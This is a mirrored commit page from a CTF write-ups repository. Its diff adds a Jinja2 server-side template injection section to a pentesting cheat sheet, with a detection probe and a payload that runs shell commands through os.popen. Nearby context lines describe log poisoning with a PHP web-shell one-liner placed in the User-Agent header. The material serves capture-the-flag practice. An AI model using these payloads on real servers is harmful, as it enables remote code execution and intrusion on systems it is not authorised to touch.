Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-24 21:03:07 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update Cheat Sheet.md

Browse source
This commit is contained in:
ARZ 2021-05-10 08:52:34 +05:00 committed by GitHub
parent f8eeb08179
commit 098dd208df
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
Cheat Sheet.md
View file

@ -454,6 +454,16 @@ Virutal Hosts file : `/etc/apache2/sites-available/000-default.conf`<br/>
If we can read log files,we can poison them to get RCE<br /> If we can read log files,we can poison them to get RCE<br />
### SSTI (Server Side Template Injection)
#### Jinja2
Check for `{{4*4}}` on the url `http://IP/{{4*4}}` if it returns "16" as a result it is vulnerable to SSTI <br/>
**Exploit**
`{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}`
#### For Apache2 #### For Apache2
For apache `/var/log/apache2/access.log` try to access the log and if we can then add `<?php system($_GET['c']); ?>`in User-agent<br/> For apache `/var/log/apache2/access.log` try to access the log and if we can then add `<?php system($_GET['c']); ?>`in User-agent<br/>